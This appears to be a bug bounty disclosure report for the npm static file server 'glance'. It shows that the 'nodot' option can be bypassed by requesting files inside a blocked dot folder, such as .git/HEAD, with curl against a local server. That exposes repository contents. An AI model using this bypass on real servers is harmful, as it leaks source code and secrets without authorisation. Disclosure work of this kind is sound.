[glance] Access unlisted internal files/folders revealing sensitive information

I would like to report sensitive information disclosure in `glance`. Similar to #486933 in ways # Module **module name:** glance **version:** 3.0.5 **npm page:** `https://www.npmjs.com/package/glance` ## Module Description a quick disposable http server for static files ## Module Stats **weekly downloads** 41 # Vulnerability ## Vulnerability Description The `glance` modules allows directory browsing and to serve static files through the browser. The config option `nodot` can be used to prevent serving sensitive folders such as `.git` or `.DS_Store` refer: https://github.com/jarofghosts/glance#command-line-options This rule can be bypassed using the technique below which can lead to sensitive information disclosure (An interesting example: https://smitka.me/). ## Steps To Reproduce: - Install `glance` ``` $ npm install -g glance ``` - Inside a project directory, initialise `git`. ``` $ git init ``` - Add rule to ignore dotfiles in `.glance.json` ```json { "nodot": true } ``` - Start `glance` in current directory. ``` $ glance --verbose glance serving /project/directory on port 8080 ``` - Now, current directory will be served by serve with the exception of folder `.git` and file `.gitignore`. - If we try to curl .`git` or `.gitignore` we get a Not Found error ``` $ curl --path-as-is 127.0.0.1:8080/.git ... <title>File Not Found</title> ... ``` - Although if we try to fetch files/folders inside a forbidden [dot]folder there is no problem at all and most of it's content can be extracted successfully (except dotfiles itself). ``` $ curl --path-as-is 127.0.0.1:8080/.git/HEAD ref: refs/heads/master ``` >The structure of git repository is well known, so it is possible to found references to the objects/packs in the repository, download them via direct requests and reconstruct the repository and obtain your files – not only the current ones, but also the past files. ## Supporting Material/References: - Ubuntu 16.04 - node v11.3.0 - npm 6.7.0 # Wrap up > Select Y or N for the following statements: - I contacted the maintainer to let them know: [N] - I opened an issue in the related repository: [N] >Hunter's comments and funny memes goes here {F416786} ## Impact The essentially bypasses the `nodot` feature and allows an attacker to read from a directory that the victim has not allowed access to. References: - https://github.com/jarofghosts/glance#command-line-options - https://smitka.me/